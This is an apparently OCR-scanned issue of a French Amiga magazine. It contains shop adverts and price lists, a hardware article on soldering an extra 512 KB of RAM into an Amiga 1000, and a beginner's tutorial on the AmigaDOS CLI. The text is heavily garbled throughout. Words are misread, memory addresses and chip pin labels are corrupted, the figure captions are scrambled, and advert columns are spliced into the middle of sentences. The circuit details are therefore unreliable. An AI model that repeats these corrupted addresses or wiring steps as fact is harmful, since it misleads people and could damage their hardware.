LATTICE 5.0 2690 KINOWORDS 950 POWER WINDOWS 670 BENCH MODULAII 1990 DATAMAT 495 SUPERBASE PRO 2490 QUARTERBACK 550 PRO PAGE 3690 TEXTCRAFT - 300 GFA BASIC 3.0 750 EXCELLENCE FR 2190 MAD 42, rue Lamartine 75009 PARIS Tél : 48 78 11 65 Métros : CADET NOTRE DAME DE LORETTE BON A RETOURNER A MAD (adresse ci-dessus) NON : .....PRENOM : ADRESSE : O Envoyez-moi ma MAD'CARD: ci-joint une photo et 2 timbres à
2. 20 F J Envoyez-moi par retour votre catalogue ainsi que votre
tarif général.
Salut les amoureux du 1000!
A en juger par vos lettres et vos coups de téléphone vous êtes nombreux à rechercher un moyen simple et peu onéreux détendre votre mémoire. Cela ce comprend quand on voit le coût actuel de la ram et l’habitude que prennent les programmeurs à utiliser de plus en plus de mémoire.
Pou.' Dore une question qui revient périodiquement et à laquelle j'ai déjà réponflu un nombre incalculable de lois. NON il n'esl pas possible ce brancher simplement une A501 sur le port frontal de l'Amiga ICOO. Ced pour une raison simple, l'organisation du décodage d'adresse et le type de ram utilisées sont plutôt incompatibles. D'un côté des 64 Kbits x 4, de l'autre des 256 KB ts x 1 ! .. Entendons nous bien; ce n’est pas impossible mais plutôt inutile. L'adaptation revient à réorganiser toute la carte pour en fat n'en réutiliser que les boîtiers de mémoire. De olus il faudra réécrire un
utilitaire c'accès pour l'horloge .si elle peut être récupérée, car dans le 500 elle est adressée par FatAgnus... Donc on laisse tomber Une autre question qui passe assez souvent, 'existe t-il une extension frontale qui permet de passer à un méga T Ma réponse est : oui je crois. Il me semble avoir vu ça sur une revue allemande il y a longtemps. Toutefois une interrogation demeure dans mes pet tes méninges surchargées, i! N'y a pas sur le connecteur frontal de quoi adresser plus de 256 Ko ???... Donc je laisse aussi tomber et je m'en va vous causer d'une bidouille marrante qui tourne sur mon
1CC0 depuis plus d'un an.
A ma sauce Le principe est suiemen! Similaire à celui d'une éventuelle extension frontale de 726 Ko. J avais à I époque pompé i’idée dans le courrier techniqje que recevaient œr- lains amigaphiles privilèges, mais depuis 1e magazine Amazing Computing par la pume de Mr. Erving en a déjà publié une remouture. Le temps étant aux extensions de mémoire je m'en va vous remettre ça à ma sauce.
Donc à la base de tout on peut extraire des docs Amiga les choses suivantes: la zone mémoire allant de 512 Ko à 2 méga soit de $ 6000C à îtlflff en hexa est déclarée réservée. Cette zone se situe juste au dessus Ces 512 Ko de CHIP ram ($ 7tffl) et on peut supposer quelle était destinée à recevoir disons les 2 méga de chip memory qui devaient planer dans les rêves de Jay Mmer à l'époque.... Supputation Cupertinienne s il en est, mais étayée par le lait que les routines du KickSlart sont prévues pour configurer ce méga et demi de ram s'il était présent dans !a machine. Ced va d'ailleurs nous
poser quelques problèmes, mon propos visant justement à aller loger de la ram à ces adresses, il serait gênant de se retrouver avec 512 Ko de ram configurée en CHIP alors que les Custom Chip seraient bien en peine d'y accéder !
Examirons maintenant la drcuiteré de décodage des adresses mémoire de notre chère (Hc combien à l'époque...) machine. Nous pouvons constater que les ram sont du type 4464 soil 64 K fois un quartet pa' bo ter. Avec ceux boîtiers nous obtenons 64 Koctect. Ce choix baroque pourrait s'expliquer par le fait qu'à ses débuts l'Amiga devait èbe une machine dotée d'un 68008 avec 64 Ko (!) De ram. Par comparaison les ram plus courantes de type 41256 sont organisées en 256 K lois 1 bil, il faut donc 8 boîtieis pour obtenir un octet complet avec un pas minimal de 256 Ko, le nombre de boîtiers nécessaires
pour obtenir 256 Ko est donc le même.
Avant que je ne devienne encore plus incompréherdb’e sacrez, lecteurs chéris, que je me suis couché Uès [TRES ) tard pour vous Dpainter un petit crobard qui vous permettra de suivre ma prose. Figure I il me semble. Pour le moment laissez tomber les liaisons en gras, ce sont des fils que nous allons rajouter plus tard.
Donc nous sommes en présence de boîliers de 64KBi:sx4. L'Amiga disposant Gonflez votre 1000 à 1 méga ou plus... Mégamontage par Tropic L’Amiga, tout Iamiga, rien que l’Amiga SYSTEMES MÆJj ô AMIGA 500 AMIGA 2000 NC A500 + A1084 S (stéréo) NC A2000 + Al084 S (Stereo) 6950 F* LECTEUR MDC30 3"1;2 DF LECTEUR MDC 5”1 4 FILTRE ELECTR.
DG88 CODEUR SATELL.
PAL GENLOCK GST30 XP PERFECT SOUND FR.
1250 2190 2540 2750 4050 850 MPS 1500 COULEUR AIGUILLE PAINTJET HP JET ENCRE MPS 1230 9 AIGUIL.
N B DESKJET 300 DPI MONIT.
MUTISYN.
Al 432 EMULAT.
FLAM MITEL 3390 15390 2090 10200 5560 850 SOFTS DES NOUVEAUTES CHAQUE SEMAINE GRAPHICSA IDEO SON-MUSIQUE DIVERTISSEMENT PERIPHERIQUES CONSTRUCTEURS A1010 3'1 2 EXT A2010 3" 1 2 INTER.
A501 512 K A500 A2058 2 MEGS A2000 KIT PC CARTE + 5” 1 4 SCANNER A4 A PLAT.
200 DPI 1390 NC 1490 6500 NC 4990 CARTE OVERDRIVE CONTROL.
SCSI A2300 GENLOCK INTERNE CARTE AT 2286 Disponible CARTE A2620 68020 14Mn4
* 2Mo CARTE FLICKER FIXER Disquettes 3"1 2 MF 2DD Konlc i 2550
2190 10600 14220 4950 12QF 10, PERIPHERIQUES CONNECTABLES OU
COMPATIBLES PROMOTION EDUCATION NATIONALE : PACK EDUCAMIGA
A2000 + Al084 + KIT PC XT 13990 F BATTLE CHESS 280 INTERCEPTOR
269 CHESSMASTER 20CO 199 BARDS TALE II* FLGHT SIMULA.
ROCKET RANGER SCENARY EUROPE ULTIMAIV 330 DRAGON S LAIR 470 SWORD OF SODAN 480 FALCON 340 CALIFORNIA GAMES 240 PAC MANIA 230 TEST DRIVE II 349 d'un processeur communiquant sur un bus de 16 bits, il nous faudra 4 boitiers pour les lui présenter, ces quatre boiüers devant réagir ainsi: 2 pour présenter l'octet de poids table ou octet pair, 2 pour présenter l'octet de poids fort ou octet impair. De plus ces octets étant toujours situés sur des adresses consécutives, l'astuce consiste à placer les quatre boiters à la même adresse puis à les activer 2 à 2 pour récupérer les octets Upper 8 Lower (In
englisb, sure boy). Ceci Implique que les adresses soit incrémentées de 2 en 2 ce qui correspond à suprimer le bit d’adresse de plus faible poid AO. Ceci tombe très bien vu que le 68000 ne dispose pas de broche AO (héhé), ceci explique aussi pourquoi 000000003 dignote en rouge en haut de votre écran quand vous essayez d'accéder à un mot sur une adresse impaire !
Pour présenter une adresse à nos boiüer pas de problème, on utilise les pattes prévues à cet effet.
Pour les sélectionner deux à deux pas de problème non plus, on va relier les dilp-selec: deux à deux, et enfin pour les organiser en octets par et impair consécutifs on a généré les signaux UCEN et LCN.
Sachant que UCEN veut dire UpperChipENable et LCEN LowerChipENable, nous voilà partis.
Canaux DMA Jusqu'ici nous n'avons parlé que de l'adressage par le 68000. L'Amiga disposant de 25 canaux de DMA logés dans Agnus, il a fallu permettre à ce circuit d'accéder à notre ram. Pour ce faire les ingénieurs de chez Amiga ont pondu le circuit qui s’étale sous vos yeux en figure 1. Les signaux UCEN et CLOCK pilote les sorte de U1H qui est un 74F138 soit un démultplexeur de 3 vers 8. Les signaux LCEN et CLOCK pilotant le démultiplexeur pair. Le boiter en U1J est un 74F399 soit un quadruple multplexeur de 2 vers 1. La foncton de ce multplexeur est de permette les accès mémoire soit au
68000 soit à Agnus suivant l'état de ses lignes de contrôle. En effet, quand ce sont les entrées lOx qui sont latchées, le 68000 présente ses adresses sur le bus, quand se sont les entrées I1x qui sont latchées c'est Agnus. A partir de ça, les démultpfexeurs se chargent de sélectoner les boiters de mémoire en générant les paires de chip-select adéquats. Et hopl Voilà pour l'explication du pourquoi de la chose, voyons maintenant le comment.
Le Comment Tout ce que nous avons à faire pour dcper notre bécane de 512 bons Ko de mémoire, c'est de rajouter 16 boiters de ram type xx464 et câbler les partes non utlisées de la drcuiterie de décodage. Car le meilleur c'est que tout les circuits nécessaires sont déjà sur la cane I (Il aurait été très facile pour Commodore de prévoir une extension frontale allant jusqu'à 1 méga (Regardons maintenant les partes en gras de la figure 1, ce sont les seuls éléments que nous allons rajouter pour décoder note demi-môga.
Vous pouvez voir que nous allons rajouter deux signaux sur les entées d'un multplexeur libre de U1J, à savoir A19 pour le coté 68000 et la masse soit un niveau logique 0 pour le côté Agnus. Ainsi, seul le 68000 pourra accéder à ces 5I2KO ce qui est bien note but. La sorte correspondante est connectée sur les entées de plus fort poids S2 des deux démulüplexeurs. Les résistances de 33 Ohm servent à améliorer les niveaux logiques sur les brins de câblage qui devront rester assez courts. Voila pour le comment de la chose.
Câbler tout ça Son, ced dit il va falloir câbler tout ça. Avant de vous précipiter sachez qu'il va falloir souder des ram qui sont des composants ultra fragiles. De plus pour réutiliser les boitiers UII.U1J et U1H il va nous falloir couper les pattes qui nous Intéressent! Donc bidouille délicate à réserver aux amateurs avertis. D’ailleurs comme il est d'usage de le faire, je signale que aussi bien moi que la rédaction d'A-News déclinons toutes responsabilités quand aux dommages que vous pourriez occasionner à votre machine en effectuant cette modification. Rassurez vous quand même, comme je
vous l'ai déjà dit ce montage tel qu'il est décnt fonctionne sur mon amiga depuis plus d'un an maintenant.
Etant donné que nous sommes entre bricoleurs compétents, je ne vous expliquerai pas comment ouvrir votre amiga. Pour enlever la Daughter Board il faut ôter les trois vis qui la maintiennent puis en la taisant jouer, la tirer précautioneusementvers le haut. En vous aidant de la figure 2 repérez les composant qui nous intéressent. Pour vous aider, les lettres U1J par exemple, signifient que le composant se trouve aux coordonnées IJ sur la carte. Si vous avez votre machine face à vous, les chiffres sont sur le bord gauche de la carte, les lettres sur le bord inférieur le long de la face avant.
Les ram sont facilement repérables.
Ce sont les 8 boitiers disposés en deux rangées de 4, coincées entre le bord inférieur gauche de la carte et les trois custom chip reconnaissables à leurs 2 carrés dorés.
Une fois que vous aurez repéré les composants référez vous à la figure 2 pour déterminer les pattes à couper. Il faut les couper au ras du circuit imprimé puis les plier vers le haut afin de pouvoir souder nos fils dessus plus tard. Pour UIH et Ull, les deux 74FI38 il faut relever la pane 3. Pour UfJ le 74F399 il faut relever les panes 10,11 et 12.
Multicouches Une fois que vous aurez relevé les paUes mettez votre fer à température. Utilisez de préférence un fer de faible puissance ou thermostaté, d'abord parceque les circuits sont sensibles à la chaleur, mais aussi parce que la plaque de l'Amiga es: multicouches. Une surchauffe de celle-ci peut entraîner un décollement des couches... En utilisant du fil de câblage monotxin, style S à wrapper, et en utilisant des longueurs minimums, relier les pattes 3 des 74F138 et la patte 10 du 74F399.
Relier la patte 12 du 74F399 à la masse qui se trouve sur la patle 8 du même circuit Souder sur la patte 11 du 74F399 un brin d'une longueur d'au moins 25 cm.
Gardez ce fil en réserve nous en reparlerons à la fin. Il s'agit du fil qui amènera A19. Prenez les 8 résistances de 33 Ohm 1(4 Watt et coupez l'une des queues pou en laisser environ 1 cm. Soudez ces huit résistances sur les deux 74F138 en laissant libre la queue la plus longue.
Après les échauffements. Le plat de résistance. Il va s'agir de souder les ram en piggy-back 2 à 2.
Référez vous à la figure 3 pour les détails. La broche 16 de chacune des 2 ram doit rester en l’air I Attention, ces composants sont très sensibles à la chaleur et à l'électricité statique. Un bon truc consiste à enficher le boitier du dessous sur un support et à piquer ce support sur un bloc de polystirène recouvert de papier aluminium, le support faisant alors office de radiateur.
Une fois que vous aurez soudé vos 16 ram en 8 paires piggy-back vous devrez constituer 4 quartés de ram composés comme expliqué d après.
Reliez les pattes Prenez 2 paires piggy-back et reliez les pattes 16 des deux ram du dessus. Une fois ceci fait soudez encore un fil d’une quinzaine dé cm. Sur cette même broche 16 afin de pouvoir la relier aux résistances de 33 Ohm. J'appellerai ce fil "Haut" pour la suite. Faites de même pour les broches 16 des deux ram du dessous. Le fil de quinze cm. Que vous souderez dans cette phase s'apellera 'Bas'.
Une fois vos quatres quanés confectionnés, soudez les 8 supports sur les ram de l'Amiga. Surtout chauffez le minimum possible !
Quand ced sera fait, enfichez vos ram en piggy- back et en vous aidant de la figure 2, reliez les brins de quinze cm. à leurs résistances correspondantes.
Coupez ces brins de façon à n'utiliser que la stricte longueur nécessaire.
J'espère que vous êtes arrivé jusqu'ici entier, il ne reste plus qu’à brancher le brin de la patte 11 du 74F399, le fameux A19.
Pour les lénéants ou les impatients, branchez ce fil directement sur la ligne d'adresse A19 que vous trouverez sur la broche 47 du 68000. En effet, avec le KickStart 1.3 notre extension ne se configurera souvent pas. Un simple AddMem et zou nous vlà avec 1 méga Seulement, il arrive que la routine qui teste la CHIP MEMORY configure nos 512 Ko supplémentaires en CHIP RAM I Vu que les Custom Chips n'arrYeront pas à récupérer leurs données, ça va planter à tous les coups. La solution consiste donc à ne transmettre A19 qu'après l'execuüon de la routine d’AutoConfig.
...C’est la nouvelle version française 2.4f de Perfect Sound !
U1J
- ,U4H(Q) lie (12) I8C (11) QC
(5)
(6) QB
(4)
(3) V
(9) H
- Haut; UC6 Bai: UC4 EBûa_ M?_ ci_ o °£b Haut; LC6 Bai: LC4
x- i
- Cxl r-Haut; UC7 i_Bai: UC5 Haut; LC7
- Bas: LCS 18 18 x l U1B U1C U1D U1E U1H S2 08 Ôï SI 02 S8 03 n
(11) 04 n
(18) 05 E3
(9) OS
(8) 07 O-VA-* UC4 0-%%-* UC5 1x4 Matt OAW-* UC6 OA V-* UC7 U1I
UC8 X ÜC3: 1 ip»S d'adresses des 512Ko de CHIP RAM LCS X LC3
d»i 512Ko ds CHIP RAM OAW-* LC4 33 n Q-WV-* LCS O VvV LC6
LC7 S2 08 SI 01 02 S8 03 n
(11) 04 E2
(18) OS E3
(9) 06
(8) 07 Mr Irving a imaginé un astucieux système de Flip-Flop qui
latche le signal WPRO’ de la ram KickStart sur les front de
la Led du lecteur de disquettes avant d’en faire un ET avec
A19.
(très très fin) Mon but n'étant pas de lui pomper son article, j'invite ceux qui font dans le raffinement à se reporter à Amazing Computing Volume 2, 1. Ce même Mr Irving propose aussi une solution logicielle au problème. Le programme qu’il fourni étant bogué et comme je suppose qu'il s'agit d'un domaine publique, je vais essayer de vous proposer ma propre version en téléchargement sur Deep. A ce propos ma version marche impec sauf avec VDK (?????) Si quelqu'un a la solution ça m'intéresse.
D'un point de vu plus pratique voici la solution que j'utilise. Il faut savoir que la configuration de la mémoire s'effectue entre le moment où vous avez fini de charger le KickStart et le moment où la machine commence à charger une disquette bootable. Si, au cour d'un reset, l'Amiga constate une altération de la structure ExecBase il relancera les routine de test de la mémoire lesquelles auront fini leur travail au moment où la machine ira chercher une disquette bootable. Si la structure ExecBase n'a pas été altérée, la machine rebootera sans chercher à connaître sa configuration mémoire.
Ces petites choses étant acquises, il apparait que la bête solution de l'interrupteur convient très bien pour résoudre notre problème. Il suffit en effet d’intercaler un interrupteur entre A19 et la broche 11 de notre 74F399. Lorsque l'on démarre la machine ou que l'on fait un reboot, on ouvre le contact en dévalidant ainsi les 512 Ko supérieurs. Dès que la machine affiche la main réclamant le WorkBench ou qu’elle lit une disquette de boot on peut fermer le contact. Attention III! Si vous avez mis AddMem dans votre startup-sequence, veillez à fermer le contact avant que AddMem ne s'exécute I
Sinon... essayez une fois pour voir, c'est assez marrant... Comme tous bon électroniciens, même du dimanche comme moi, nous n'allons pas insérer notre interrupteur sans un minimum de forme, ça ne ce fait pas et surtout ça plante la bécane.
Jetez un oeil à la figure 4, tout y est, il s'agit d'un simple antirebond constitué d'un bistable dont on utilise la sortie pour faire un ET avec A19. Vous vous débrouillerez à fixer le 74xx00 et l'interrupteur. Pour ma part, l'interrupteur est en face avant à côté du lecteur, et le 7400 est collé au rubson (si si!) Sur les nervures au dos de la face avant. Vous pouvez piquer le +5V sur la large piste qui se trouve sous le 'l'sérigraphié par exemple ou sur la patte 16 des 74F138 la masse se trouve partout notemment sur le blindage (!).
Pour les gourmands en mémoire, il est très possible de pousser jusqu'à 2 méga en rajoutant des démultiplexeurs.
Cependant, attention à deux choses: si vous avez une daughter board la place pour les ram est comptée. Sinon dans tout les cas, il vous faudra prévoir une alimentation plus musclée. De toutes façons, vous allez devoir y penser à cette alim car pour le mois prochain, LUCAS Board une carte 68020 et 68881 puis peut être pour dans deux mois la description d'un système de disque dur... Dernière chose pour les étourdis, notre mémoire étant placée juste après les 512 premiers Ko il faudra taper AddMem 80000 fffff. Enjoy I!
Ban de ram 2S6Ko
- agami- ram d'origine TROPIC on Deep pour les quesdongs.
JT Fige 3 Figé CLI POUR DEBUTANTS ou, Dans les Cavernes de l’AmigaDos par ZORGLUB.
- La rédaction d'A-News m'a demandé de prendre le relais de
Patrick Conconi dans celle rubrique, je le ferai avec grand
plaisir. Patrick vous a initiés dans ses articles à un certain
nombre de commandes, mais cela supposait que vous saviez ce
qu'est le CLI et à quoi il sert. Avant de continuer, je
voudrais donc faire un petit détour, vous me direz si cela vous
convient, soit en écrivant à A-News, soit en me passant vos
messages par le 3615 DEEP, rubrique A-News, ou dans ma BAL. Ce
premier article est un peu long, les suivants seront plus
courts et plus ciblés.
1er épisode Le CLI c’est quoi ?
Il y a quelques lemps (6 mois, 6 jours, 6 heures ?), vous avez déballé voire Amiga tout neuf, vous l’avez allumé, inséré dans la fenie ad hoc la disquenc WorkBench 1.2 ou 1.3 qu’il vous demandait la tête en bas, et commencé à cliquer de la souris dans les icônes.
Au hasard de l’ouverture des fenêtres, vous êtes tombé sur une icône intitulée CLI ou SHELL selon le cas; en cliquant dessus, une fenêtre s’est ouverte, dans laquelle apparaissait quelque chose comme 1 ou l.SYS: et puis plus rien.
Si à ce moment votre chat, votre femme ou tout être doué de vision et suffisamment féru de B.D. était passé dans la pièce, il aurait vu au-dessus de votre tctc un superbe point d'interrogation bleu fluorescent, et une magnifique bulle blanche dans laquelle on voyait: " Kekseksa ? A quoi çà sert ? Dis, comment çà marche ? ", Le réflexe normal est d’essayer n'importe quoi, ou de demander à un copain qui sait, mais certainement pas d’aller lire le manuel. C’est dommage, car même dans le manuel en anglais reçu avec mon Amiga il y a bientôt deux ans, il y avait 23 pages sur le CLI, et les
manuels livrés ces derniers jours avec les machines sont en français et bien faits, du moins quand on est déjà un peu informaticien. Mais de là à motiver l'individu normalement constitué mais non initié à utiliser le CLI ou le SHELL, c’est autre chose.
Le voudrais essayer d’entraîner les "non informaticiens" , et rassurez-vous, je ne suis pas informaticien non plus, dans un jeu d'aventure passionnant, car le CLI est l’outil qui va vous permettre de commencer à descendre dans les entrailles du système, et elles sont riches et profondes !
Dans un jeu d’exploration classique, vous trouvez un tas de choses plus ou moins jolies, dont certaines vous pètent à la figure, au fur et à mesure de l’exploration des salles et cavernes de toutes sortes. A propose de choses qui vous pètent à la figure, vous aurez droit un jour ou l’autre à une manifestation assez sinistre du caractère farceur de l’Amiga: l’écran devient tout noir, avec en haut une fenêtre en caractères rouges qui raconte une histoire de GURU parfaitement incompréhensible pour le commun des mortels.
C’est absolument sinistre mais , au stade où vous en êtes, c’est assez inoffensif et au demeurant parfaitement inutile. Cela veut dire que vous avez fait quelque chose qui a planté le système.
Il faut bien comprendre que l'option prise par les concepteurs de l’Amiga d'en faire une machine très ouverte, et dans laquelle on donne accès à vraiment beaucoup de choses à l’utilisateur, a pour contrepartie que le système manifeste sa mauvaise humeur quand on lui demande des choses qui lui mélangent les crayons.
Occasionnellement d'ailleurs, il se les mélange tout seul, comme un grand, sans l'aide de personne.
Dans les cavernes de l'AmigaDos (c'est le système d’exploitation de l'Amiga), vous pourrez en plus de ce qui s’y trouve déjà, apporter des trucs que vous irez chercher dans les disquettes du domaine public, par exemple, et qui vous permettront d'aller encore plus loin dans votre découverte. J’ai un certain nombre de bons jeux classiques sur ma machine (Arkanoîd, Intercepter, Marblemadness!, etc) et divers programmes d’application (traitement de texte, graphisme, divertissements mathéma tiques et autres) , mais le jeu sur lequel je passe le plus de temps, c’est le système, par
l'intermédiaire du CLI.
Si plus tard vous vous mettez à la programmation en C. vous pourrez faire dire papa et maman à votre machine, mais le C , c’est pas mon truc et c’est déjà très bien traité par ailleurs.
Bon, on y va. Le Workbench (ou Atelier, mais je continuerai à dire Workbench, sauf avalanche de protestations) est ce qu'on appelle une interface utilisateur conviviale. Comprenez un machin simple à utiliser pour faire marcher votre Amiga. Mais comme il y a des contreparties à tout, scs possibilités sont limitées (moins toutefois qu'il n'y paraît à première vue).
Le CLI, ou le SHELL suivant le cas, est une interface beaucoup plus puissante, mais qui demande un certain apprentissage et, pour bien faire, une connaissance élémentaire 3e l'AmigaDos.
Nous allons donc, si vous le voulez bien, découvrir progressivement l'AmigaDos en faisant des exercices au moyen du CLI (pour le moment, considérez que CLI ou SHELL sont la même chose, nous étudierons les différences en temps voulu. Le SHELL est un CLI légèrement perfectionné).
Le CLI sert fondamentalement à trois choses: ? Lancer des programmes (dont une variété s'appelle les commandes), ? Manipuler des fichiers, et ? Gérer les ressources du système, dont les périphériques.
La prochaine fois, nous commencerons l’exploration des cavernes, mais je voudrais dès aujourd'hui vous donner la carte générale.
C'est parti !
Amiga allumé, disquette Workbench dedans, on trouve dans un tiroir l'icône CLI ou l'icône SHELL, on clique, et il s'ouvre une fenêtre qui prend à peu près le quart de l'écran, et dans laquelle on voit apparaître, selon les versions quelque chose comme: 1
l. SYS: Tout d’abord, étendons la fenêtre à toul l’écran, pour
avoir de la place. J’espère que vous savez comment faire !
Ensuite, sans chercher à comprendre, et par mesure de sécurité, tapez cd dfO: (suivi bien sûr d’une frappe de la touche retour de chariot, mais cela , nous ne le dirons plus) puis, dès que le 1 ou le
l. Workbenchl.3 esl là, tapez DIR.
I AmiiaShi?n
4. Bruceboot:anewsl3 dir paees (dir) .fastdir disquedur.txt
DP.info rr jil
4. Biutceb o o t : ane us 13 Vous voyez s’afficher une série de
noms suivis de (dir), ce sont les répertoires, puis, en deux
colonnes, d’autres noms qui sont des noms de fichiers et de
programmes.
Vous observez tout de suite qu’il y a bien plus de répertoires qu’il n’y avait d’icônes dans la fenêtre qui s’ouvrait lorsque vous avez, tout au début, cliqué dans l’icône de la disquette Workbench.
Ceux qui ne roupillent pas encore auront remarqué que certains fichiers du bas de la liste ont le même nom que certains répertoires, suivi de .info , et que ce sont précisément les noms des tiroirs et autres objets graphiques plus ou moins réussis qui apparaissent dans la fenêtre du Workbench. Il y en a même qui vont déduire à juste titre que les fichiers qui se terminent par .info correspondent aux icônes visibles dans la fenêtre du Workbench.
Bon, cm voit déjà que le CLI vous révèle l’existence de plus de cavernes que ne le laissait entrevoir le Workbench.
Dans le prochain article nous ferons l’inventaire des répertoires et vous constaterez l’énorme diversité des choses que l'Amiga vous rend accessibles par le CLI, ce qui n’est pas le cas pour un PC par exemple.
J’allais oublier... Pour jeter la fenêtre CLI après usage, tapez ENDCLI ou ENDSHELL, tout en majuscules, ou tout en minuscules, ou en mélangeant, le CLI s’en fout, sur ce point-là, il n’est pas regardant.
A la prochaine fois, à moins qu’entre- temps le torrent d’injures reçu par courrier ou sur DEEP ne soit au moins 157 fois plus important que les encouragements ou les questions.
(Ed: c'était trop bon pour arrêter. On continue...) 2 e épisode Un parcours rapide Bon, on a le trousseau de clefs, la lampe, du café chaud, du Yoplait ou de quoi fumer à portée de la main (j’écris pour toutes les générations), mais pas trop QCU cedric DP iï'q près du clavier.
Première saUe: le répertoire C. 11 ne contient à l’origine " que " les commandes de l’Amigados (dans la version 1.3, il en a tout de même 641), ce sont do petits programmes destinés par exemple à examiner le contenu des disquettes (comme DIR) ou à se mouvoir dans les disquettes (CD) ou à travailler sur des fichiers (COPÏ). Plus lard, nous y mettrons un tas de petits programmes trouvés dans le domaine public et qui vont nous rendre la vie tellement plus agréable.
Sachez déjà que les commandes et programmes du répertoire C pourront être appelés à tout moment, quel que soit le répertoire dans lequel on se trouve, simplement en tapant leur nom.
Deuxième salle : le répertoire Prefs_ Il contient les programmes qui permettent de changer toute une série de paramètres de fonctionnement du système, mais il concerne surtout le Workbench, et tout est accessible par icônes, nous passons très vite, du moins pour l’instant.
Premier magasin d’outillage : le répertoire System On y trouve divers outils aux noms bizarres, comme NoFastMem, FixFonts, Format. Ne vous en faites pas, on les utilisera tous un jour ou l’autre.
Deuxième magasin d’outillage: le répertoire Utilities.
La quincaillerie que l’on y trouve a des noms nettement plus suggestifs (iCalculator, Clock, Notepad). J’avoue ne pas toujours comrendre parfaitement la logique de distribution des outils entre ces deux magasins, mais peu importe ! Il y en a un dont on fera un usage intensif, c’est MORE, qui sert à lire des fichiers de texte Salle suivante: L Ce répertoire contient des " handlers " ou gestionnaires; ce sont des programmes destinés à gérer les relations avec certains éléments du système, principalement avec des unités logiques; nous verrons plus tard ce que c’est. Les handlers sont comme le
sucre qui donne un mauvais goût au café quand on n’en met pas dedans: on s'aperçoit généralement de leur existence parce que pour une raison quelconque il en manque un dans le tiroir L et quelque chose se met à foirer. Tiens, juste pour faire un exercice, faites: cd dfO: cd 1 dir vous voyez apparaître la liste des handlers.
Faites maintenant: rename ram-handler machin cd ram: et le système vous dit can't fmd ram: Ce n’est pas que l'unité logique ait disparu, mais vous avez simplement enlevé l'intermédiaire qui permet de lui parler.
Faites maintenant: rename machin ram-handler, et tout rentre dans l'ordre.
Certains programmes demandent pour marcher qu’un handlcr spécial soit présent dans le répertoire L:, si on ne l'y a pas copié, çà coince et c'est normal.
A-News 13 Salle suivante: DEVS ] On commence à connaître la routine: cd dfO: cd devs dir Tiens, tiens, dans cette salle-là, il y a des placards, qui s'appellent KEYMAPS.
PRINTERS, CUPBOARDS, et des "deviccs".
En anglais, un device, c'est un dispositif, on ne peut pas être plus vague et malheureusement le mot device recouvre des choses très différentes dans leurs natures.
Les deviccs que l'on trouve ici sont pour la plupart des programmes qui établissent une relation de base avec une unité donnée. Par exemple, le printerxievice gère les transmissions à l’imprimante quelle qu’elle soit. Il aura toutefois besoin de l'aide d'un programme spécialisé (driver) pour chaque type d’imprimante, on les trouve dans le répertoire PRINTERS. De nouveau, comparons ce dispositif génial à celui du PC, pour lequel les drivers d’imprimantes font partie du programme d'application.
Dans le tiroir KEYMAPS. On va trouver les fichiers de configuration des claviers, le plus important pour nous s'appelle . Nous l'utiliserons plus tard avec la commande SETMAP qui pour une raison bizarre est dans le répertoire SYSTEM, nous verrons en temps voulu pourquoi il vaut mieux aller la copier dans le tiroir "C".
Un device important est la MountLisl; c'cst elle qui contient la liste de tous les dispositifs que le système est censé rccommaîtrc, avec leurs spécifications.
Quand nous en serons à la modifier, nous aurons déjà droit au grade d'explorateur expérimenté du CLI.
La caverne des jolies blondes: le répertoire S Le S veut dire ici Script. La Script- Girl est dans un studio de cinéma la (censément) jolie fille qui note scrupuleusement tout ce qui se passe pour éviter les bêtises comme la moto qu'on pouvait voir à l'arrière-plan d’une scène de la première version de Ben-Hur.
Manque de pot, ici, les fichiers SCRIPT ne sont que des listes de commandes CLI que l'on peut faire exécuter en séquence automatique par le système au moyen de la commande EXECUTE.
L’intérêt du répertoire S est similaire à celui du répertoire C. Tout fichier de commandes du typer "SCRIPT" qui se trouve dans le répertoire S peut être lancé par la commande EXECUTE quel que soit le répertoire dans lequel on se trouve.
Un fichier SCRIPT particulièrement remarquable est la STARTUP- SEQUENCE, qui se lance toute seule au démarrage du système. En la modifiant, nous pourrons donc agir sur la manière dont le système démarre, et sur tout un us de choses qui se mettent en route à ce momcnt-là. Montre-moi la STARTUP- SEQUENCE, et je le dirai qui tu es. La STARTUP-SEQUENCE est vraiment la Non, elle n’est pas blonde, mais avec Dpaint... Photo Zak signature de l’utilisateur fana du CLI.
Mais en attendant, ne vous en faites pas, celle que Commodore a mis sur voue disquette Workbench n'est pas mal. Tout au plus est-elle un peu lente parce qu'elle prend beaucoup de précautions.
Le répertoire T Là, c’est littéralement le foutoir. C'est là que le système va mettre les fichiers temporaires dont il a besoin pour des raisons qui lui sont propres, qu'il ne veut pas garder en mémoire, et dont nous n'avons que faire. Si nous avons de la mémoire en rab, nous apprendrons à mettre le répertoire T en RAM:, et sinon nous apprendrons à le vider de temps en temps pour ne pas encombrer inutilement notre disquette système.
L’imprimerie: le répertoire FONTS C’est là que sont rangées, bien en ordre, les polices de caractère du système.
Pour le moment, nous ne pouvons en utiliser qu'une avec le CLI, c’est la police par défaut, à savoir TOPAZ.
L’Amiga a la caractéristique bien particulière que, même lorsqu'on est en mode texte, toutes les lettres sont dessinées en mode graphique. Si vous avez eu la curiosité d’essayer à partir du Workbench le mini-traitement de texte NOTEPAD. Vous aurez eu l’occasion d'appeler les différentes polices de caractères et de voir l'allure qu'elles ont.
Moyennant l’utilisation de petits programmes du domaine public, nous pourrons plus lard utiliser ces polices dans le CLI et les faire apparaître dans le Workbench. Imaginez les noms de vos icônes en caractères Sapphire ! Cela n'ira pas toutefois pas sans certains inconvénients.
Bien entendu, nous pourrons importer dans le répertoire FONTS toutes les polices de caractères qui traînent un peu partout et nous en servir.
La bibliothèque de l’alchimiste: le répertoire LIES.
Voilà une bibliothèque peu ordinaire, on ne peut lire aucun des bouquins ! Les bibliothèques (libraries) qu'on y trouve sont en fait des recueils de routines en code machine, peu encombrantes, que le système et les programmes d’application utilisent très souvent. Pour nous qui restons au niveau du CLI, contentons-nous de savoir qu'il en va de même que pour les handlcrs: si quelque chose ne marche pas, c'est peut-être bien qu’il manque une bibliothèque dans le répertoire LIBS.
La salle vide: le répertoire EMPTY Comme son nom l’indique, il n'y a rien dedans. Sous Workbench, pour créer un nouveau tiroir dans une fenêtre, on commence par faire une copie du tiroir EMPTY, puis on déplace cette copie là où on en a besoin, puis on lui donne un autre nom. Les commandes du CLI nous donneront les mêmes possibilités.
Et voilà, nous avons fait le tour. Dès la prochaine fois, nous apprendrons la navigation: comment se promener d’une salle dans une autre, et comment déplacer ce qui s’y trouve.
- ZORGLUB élucubrations dysnéiennes avec... MovieSetter !
